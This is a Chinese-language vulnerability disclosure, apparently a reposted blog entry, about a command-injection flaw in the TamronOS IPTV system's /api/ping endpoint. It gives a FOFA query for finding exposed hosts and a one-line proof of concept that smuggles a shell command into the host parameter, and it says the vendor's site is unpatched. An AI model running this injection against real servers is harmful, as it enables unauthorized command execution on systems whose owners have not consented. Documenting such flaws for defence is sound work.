其他分享
首页 > 其他分享> > TamronOS IPTV系统 ping 任意命令执行漏洞

TamronOS IPTV系统 ping 任意命令执行漏洞

作者:互联网

TamronOS IPTV系统 ping 任意命令执行漏洞

目录

系统简介

漏洞描述

漏洞复现

总结


系统简介

TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案,系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。 同时系统支持多种节目源接入(卫星源、广电源、运营商IPTV源、网络源、自办频道、编码器等其他第三方设备提供的源)。基于Apple公司的HLS直播传输技术,以及我公司自主研发的动态内存切片技术,在使用 流媒体输出的同时保证了最大用户待机量(一个千兆口1500用户、一个万兆口6-8K用户),同时也是国内唯一能实现单台服务器负载140-200路直播的IPTV系统。 TamronOS采用自主研发的视频解析下载系统,配合云数据,能够自动完成对影片的采集、下载、合并、入库,所有影视剧与十大视频网站几乎同步更新。同时拥有最人性话UI设计和更为直观的后台管系统,未接触过 类似系统的用户,可以通过阅读本教程快速熟练的搭建IPTV系统。

漏洞描述

TamronOS IPTV 系统  api/ping  存在任意命令执行漏洞,攻击者通过漏洞可以执行任意命令。

漏洞复现

FOFA搜索
app="TamronOS-IPTV系统"

漏洞POC如下 /api/ping?count=5&host=;id;

 

厂商尚未提供漏洞修复方案,请关注厂商主页更新: TamronOS--全国领先的IPTV系统提供商

总结

这个系统的提供商官网也还存在这个漏洞

标签:IPTV,ping,系统,TamronOS,用户,漏洞
来源: https://blog.csdn.net/Jietewang/article/details/122095631